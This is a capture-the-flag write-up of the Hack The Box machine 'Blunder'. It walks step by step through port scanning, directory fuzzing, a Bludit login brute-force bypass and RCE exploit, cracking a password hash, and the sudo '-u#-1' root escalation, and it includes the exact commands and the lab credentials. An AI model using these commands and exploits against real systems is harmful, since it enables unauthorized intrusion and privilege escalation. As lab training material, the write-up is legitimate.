---
title: HTB Blunder
date: 2020-11-02
---


# BLUNDER HTB

## Initial Recon

```
sudo nmap -sS -sC -sV 10.10.10.191 > rec_ini
```
![](Pictures/rec_ini.png)

It seems that only two ports are open:

The ftp (closed) and the webserver

Let the complete port scan run and check the webpage

```
sudo nmap -p- -T5 10.10.10.191 > all_ports
```


## Onto User


![](Pictures/home_page.png)

The page looks like a typical HTML page with some links. One of the links lead to a Twitter account and all. 

At this point of time, after checking all ports scan results,I found out that there's no other service running.

So, now I'll do a directory brute force :

For this I'll use Sec-List's Web-Content common.txt wordlist

```
wfuzz -c -z file,/usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt --hc 404,403 http://10.10.10.191/FUZZ
```

I got the following result from the directory bruteforcing.

![](Pictures/wfuzz_res1.png)

So there is an admin panel and the robots.txt

![](Pictures/budit_admin.png)

> After looking online I found out that Budit is an open source CMS
> It has a bruteforce mitigation. But according to CVE-2019-17240 it can be bypassed
> But before that we need a username.

To look for the username, I need to find a text file. The robots.txt didnt give much information.

```
wfuzz -c -z file,/usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt --hc 404,403 http://10.10.10.191/FUZZ.txt
```

todo.txt was found in the wfuzz:

![](Pictures/fuzz_res2.png)

The following things we get in todo.txt

```
-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING
```

* We now have a username : fergus 
* We have a CVE which can be used to bypass the bruteforce mitigation in the Bludit.
* We need password list.
* For building the password list we can make use of the words available on the

```
cewl http://10.10.10.191 > wordlist
```

There are around 590 words. So no need to reduce the wordlist.

I got the POC for the CVE from here:

```
https://github.com/pingport80/CVE-2019-17240/blob/master/brute.py
```

The help for the script is also given along with it.

The password was found to be : RolandDeschain

![](Pictures/password_found.png)

Therefore, the credentials are :

```
fergus : RolandDeschain
```


Now we can use the RCE exploit `CVE-2019-16113` for getting a shell. The following exploit can be used : 

```
https://raw.githubusercontent.com/ynots0ups/CVE-2019-16113/master/cve-2019-16113.py
```

![](Pictures/exploit.png)

Change the target IP, port, username and password in the script.

```
python3 exploit.py

nc -nlvp 1331
```

Setup the listener according to your wish on your local machine.

![](Pictures/shell.png)

Shell recieved

Get a proper shell

```
python3 -c 'import pty;pty.spawn("/bin/bash")'

export TERM=xterm
```

In the bluder-database folder, the username Hugo was found along with the hashed password.

![](Pictures/username_password.png)



![](Pictures/password_crack.png)

Since I don't know the hash format, I pasted it on Crackstation.

The hash format can be identified using a tool called hash-identifier

```
hash-identifier
```

![](Pictures/find_hash_format.png)

Then it can be cracked using hashcat.

So the creds for the user Hugo are :

```
hugo : Password120
```

```
su hugo
```


![](Pictures/user.png)


```
sudo -l
```

Check the sudo permissions :


![](Pictures/sudo_permissions.png)


It says that the user has permission to run /bin/bash as root

So we can use the recent sudo exploit to get root priviledges.

After looking into the sudo bugs I found out that the following CVE can be used. 

```
https://www.exploit-db.com/exploits/47502
```

It basically says that if we use the user id as -1 or a very large number then the user will point to the root

```
sudo -u#-1 /bin/bash
```

![](Pictures/root.png)

Thus we get the root shell
